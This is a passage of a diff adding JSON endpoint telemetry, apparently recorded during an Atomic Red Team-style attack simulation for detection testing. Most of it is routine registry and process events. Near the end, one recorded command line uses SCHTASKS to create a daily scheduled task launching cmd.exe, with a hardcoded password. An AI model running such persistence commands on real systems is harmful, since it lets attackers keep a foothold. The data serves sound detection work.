"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "taskschd.dll", + "image_path": "C:\\Windows\\System32\\taskschd.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805259984, 
+ "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573849650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573849650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573849650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C", + "registry_value": "W32:000000000009053C", + "timestamp": 131883573875900000, + "unique_pid": 
"{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883573875900000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "file", + "file_name": "SVCHOST.EXE-E3F19127.pf", + "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-E3F19127.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573894960000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573905270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573905270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + 
"timestamp": 131883573905270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883573905730000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883573905730000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573906670000, + "unique_pid": 
"{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573906820000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883573906980000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883573906980000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "file", + "file_name": "SCHTASKS.EXE-2DE769BF.pf", + "file_path": "C:\\Windows\\Prefetch\\SCHTASKS.EXE-2DE769BF.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573907300000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": 
"registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573938540000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573938700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573938700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883573938700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883573968550000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883573968550000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Plain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Plain\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_value": "{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\spawn", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\spawn\\Index", + "registry_value": "Index", + "timestamp": 
131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Hash", + "registry_value": "Hash", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Schema", + "registry_value": "Schema", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Date", + "registry_value": "Date", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Author", + "registry_value": "Author", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\URI", + "registry_value": "URI", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Actions", + "registry_value": "Actions", + "timestamp": 131883573970580000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "registry", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Triggers", + "registry_value": "Triggers", + "timestamp": 131883573970580000, + "unique_pid": 
"{42FC7E13-B2A1-5C05-0000-00103C650100}" + }, + { + "event_type": "process", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "subtype": "terminate", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "process", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6840, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573970860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573970730000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573970890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "event_type": "process", + "pid": 6840, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573970890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"SCHTASKS /Create /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \" Atomic \"task /TR C:\\windows\\system32\\cmd.exe /SC daily /ST 20:10\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7172, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573971509984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}", + "unique_ppid": 